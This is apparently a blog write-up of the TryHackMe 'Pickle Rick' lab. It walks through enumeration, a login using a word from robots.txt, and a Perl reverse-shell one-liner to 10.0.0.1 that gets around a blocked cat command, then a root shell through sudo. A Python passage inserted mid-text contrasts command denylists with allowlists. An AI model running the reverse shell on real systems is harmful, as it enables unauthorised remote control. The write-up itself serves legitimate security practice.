Pickle Rick – Try Hack Me

This is the room link: Click me.

Deploy the machine and let’s start with the initial port scan.

We only have the SSH and HTTP ports open. Let’s check out what’s on port 80. It’s a message from Rick to Morty requesting help. He needs to find the three ingredients (our flags).

If we view the page source, there is a comment that reveals a username.

I ran gobuster and saw the assets folder, and the robots.txt.

Accessing the assets folder, there were a few images. I downloaded them and ran exiftool, strings and steghide against them, but I remained empty-handed.

Checking robots.txt, there is a single entry/word.

Running nikto discovers a login page.

We access the login page. By viewing the source code of the page, there is a base64-encoded string, but after decoding it’s a rabbit hole. So, we have a user (R1ckRul3s), but we have to find the password. I tried the word from robots.txt, and the login was successful.

We are redirected to a portal, from where we can execute commands.

By listing the content of the current folder, we see our first ingredient.

But trying to print the content of the file, we have a surprise… the cat command is blocked.

After messing around a bit and trying to get a reverse shell, I finally managed to get it by using the pentestmonkey reverse shell cheat sheet. It was a Perl reverse connection. This is the shell, modify it to fit your needs (IP and PORT):

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Execute the command, and check your netcat. You should have received the connection. Now you can see the content of the first ingredient that is in the current folder.
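Blocking cat did not stop the Perl one-liner because a filter that names forbidden commands leaves every other program runnable. The following is an added example, not the room's code or the author's: it assumes the panel uses a word denylist (the page does not show its implementation) and contrasts it with a hypothetical allowlist. The command names, validators and sample strings are constructed for illustration.

```python
import shlex

# Assumption: the page only confirms that "cat" is blocked.
DENYLIST = {"cat"}

# Hypothetical allowlist for a diagnostics panel:
# command name -> validator for its arguments.
ALLOWED = {
    "uptime": lambda args: not args,
    "df": lambda args: args in ([], ["-h"]),
    "ls": lambda args: all(a in ("-l", "-a", "-la") for a in args),
}

def denylist_permits(command: str) -> bool:
    """Weak check: reject only when a denied word appears in the input."""
    words = command.replace(";", " ").split()
    return not any(w in DENYLIST for w in words)

def allowlist_parse(command: str):
    """Strict check: return an argv list to run without a shell, else None."""
    try:
        argv = shlex.split(command)
    except ValueError:  # unbalanced quotes
        return None
    if not argv:
        return None
    name, args = argv[0], argv[1:]
    validator = ALLOWED.get(name)
    if validator is None or not validator(args):
        return None
    # Caller runs this with subprocess.run(argv, shell=False), so shell
    # metacharacters are never interpreted even if one slipped through.
    return argv

def compare(samples):
    """Map each sample to (denylist verdict, allowlist verdict)."""
    return {s: (denylist_permits(s), allowlist_parse(s) is not None)
            for s in samples}

# Constructed inputs; the perl line stands in for any interpreter call.
SAMPLES = ["cat ingredient.txt", "perl -e 'print 1'",
           "ls -la", "ls -la; perl -e 'print 1'"]

if __name__ == "__main__":
    for cmd, (deny_ok, allow_ok) in compare(SAMPLES).items():
        print(f"{cmd!r}: denylist permits={deny_ok}, allowlist permits={allow_ok}")
```

Only the allowlist rejects the interpreter invocation and the chained command; the denylist passes both because neither contains the blocked word.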

The second ingredient is located in the /home/rick folder.

Checking if we can sudo and what we can sudo, we receive the following.

To spawn the root shell I used the sudo su command, and then went to the root folder to get the third flag.